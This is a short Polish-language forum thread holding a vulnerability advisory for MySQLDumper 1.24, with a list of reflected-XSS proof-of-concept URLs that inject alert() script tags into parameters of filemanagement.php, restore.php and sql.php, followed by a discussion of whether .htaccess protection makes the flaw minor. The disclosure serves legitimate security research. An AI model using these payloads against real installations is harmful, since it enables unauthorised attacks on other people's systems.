błędy mysqldumper 1.24

[lem]

Kod:

Name 	:  MySQLDumper 1.24 stable

Vendor 	: Browse MySQLDumper Files on SourceForge.net

Bug 	:  XSS

Date 	: 16.06.2010

Tested 	: Ubuntu 10

Thanks	: 4 you

Details	:
	
"> as a prefix for <script> is needed to close first < tag (see at source).

http://localhost/mysqldump/msd1.24stable/filemanagement.php?action=dump&kind="><script>alert(1)</script>
and another in :
	filemanagement.php?dbactiv="><script>alert(32)</script>

	msd1.24stable/restore.php?filename=<script>alert(111)</script>

	msd1.24stable/restore.php?dump_encoding=<script>alert(111)</script>

	msd1.24stable/sql.php?context="><script>alert(111)</script>

	msd1.24stable/sql.php?tdc="><script>alert(111)</script>

	msd1.24stable/sql.php?db="><script>alert(111)</script>
	
	msd1.24stable/sql.php?dbid="><script>alert(111)</script>

	msd1.24stable/sql.php?tablename="><script>alert(111)</script>

	msd1.24stable/sql.php?sql_statement="><script>alert(111)</script>

	msd1.24stable/sql.php?bb="><script>alert(111)</script>

[lem]

rozmawialem wczoraj z producentem, zgodzilismy sie co do jednego. z punktu widzenia tworcow oprogramowania, blad wcale nie jest taki duzy, z tego wzgledu, ze dostepu do aplikacji powinien bronic htaccess...

[TQM]

Prawda jest taka ze aplikacja tego typu nie powinna w ogole byc widoczna ze swiata :P

[lem]

Ba!
Zdziwiło mnie jedno, po mailu od tego pana i jego sugestii na temat htaccess.
Co jeśli ktoś obejdzie htaccess?

Ale cóż... najważniejsze, że trochę się pobawiłem z tą aplikacją. Webgoat tak nie cieszy, jak zabawa na żywym organiźmie

[TQM]

Jesli ktos obejdzie htaccess to nie tylko apliakcja dziurawa ale i user glupi, bo htaccess to nic innego jak konfiguracja przniesiona z konfugu apacza do osobnego miejsce, ktore jest pod kontrola usera a nie admina